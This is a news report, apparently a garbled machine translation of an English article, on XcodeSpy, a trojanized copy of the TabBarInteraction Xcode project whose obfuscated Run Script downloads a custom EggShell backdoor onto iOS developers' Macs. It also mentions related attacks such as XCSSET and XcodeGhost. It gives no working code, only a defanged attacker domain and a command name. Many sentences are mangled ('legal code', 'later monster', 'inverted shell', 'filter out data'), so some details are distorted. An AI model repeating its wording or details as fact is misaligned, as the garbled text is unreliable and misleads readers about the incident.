Researchers have said they have found a Trojan-based code library in the wild that attempts to install advanced observation software on the Macs of iOS software developers.
It comes in the form of a malicious project written by the attacker for Xcode, a developer tool that makes Apple freely available to developers who write apps for iOS or another Apple operating system. The project was a copy of TabBarInteraction, a legitimate open source project that makes it easier for developers to animate iOS tabs based on user interaction. An Xcode project is a repository for all the files, resources and information needed to build an app.
Walk on eggshells
In addition to the legal code, there was an obscure script known as ‘Run Script’. The script, which was executed each time the developer started, contacted an attacker-controlled server to download and install a customized version of EggShell, an open source backdoor that users spy on through their microphone, camera and keyboard.
Researchers at SentinelOne, the security firm that discovered the Trojan project, called it XcodeSpy. They say they discovered two variants of the custom EggShell that were dropped by the malicious project. Both were uploaded to VirusTotal using the web interface from Japan, the first one on August 5th and the second one on October 13th thereafter.
“The later monster was also found late in the wild on the victim’s Mac in the United States,” SentinelOne researcher Phil Stokes wrote in a blog post on Thursday. “For reasons of confidentiality we can no longer provide information about the ITW [in the wild] incident. However, the victim reported that they were repeatedly targeted by North Korean APT actors and that the infection came to light as part of their regular threatening activities. ”
So far, researchers at the company are only aware of one case in nature, of an American organization. Indications from the SentinelOne analysis suggest that the campaign “was in place at least between July and October 2020 and could have targeted developers in Asia as well.”
Developers under attack
Thursday’s report comes two months after researchers told both Microsoft and Google that hackers backed by the North Korean government are actively trying to infect the computers of security researchers. To win researchers’ trust, the hackers spent weeks on Twitter personas and developed online working relationships.
Eventually, the fake Twitter profiles asked the researchers to use Internet Explorer to open a web page. Those who took the bait would find that their fully patched Windows 10 machine installed a malicious service and a memory backdoor. Microsoft patched the vulnerability last week.
In addition to using the watering hole attack, the hackers also sent a Visual Studio project to prospective developers that allegedly contained source code for proof of concept. In the project, appropriate malware was detected that contacted the attackers’ control server.
Obscured malice
Experienced developers have long known how important it is to check for malicious Run Scrips before using a third-party Xcode project. While finding the scripts is not difficult, XcodeSpy tried to make the task more difficult by coding the script.
SentinelOne
When decoded, it was clear that the script contacted a server at cralev[.]me and send the mysterious command mdbcmd through an inverted shell built into the server.
SentinelOne
The only warning a developer will get after running the Xcode project is something like this:
Patrick Wardle
SentinelOne provides a script that makes it easy for developers to find Run Scripts in their projects. Thursday’s post also provides indicators of compromise to help developers find out if they are targeted or infected.
A vector for malice
This is not the first time Xcode has been used in a malware attack. Last August, researchers uncovered Xcode projects that were available online using two then-Safari zero-day vulnerabilities. Once one of the XCSSET projects is opened and built, a TrendMicro analysis is found, the malicious code will run on the developers’ Macs.
And in 2015, researchers found 4,000 iOS apps infected by XcodeGhost, the name given to a tampered-with version of Xcode that spread mainly in Asia. Applications compiled with XcodeGhost can be used by attackers to read and write to the device’s clipboard, open specific URLs, and filter out data.
Unlike XcodeGhost, which infected apps, XcodeSpy targeted developers. Due to the quality of the XcodeSpy surveillance backend installed, it would not be much of a stretch for the attackers to eventually deliver malware to users of the developer’s software as well.
“There are other scenarios with such high-quality victims,” SentinelOne’s Stokes wrote. Attackers can simply pull in interesting targets and collect data for future campaigns, or they can try to collect AppleID credentials for use in other campaigns that use malware with valid Apple signatures for developers. These proposals do not exploit the possibilities and do not exclude them from each other. ”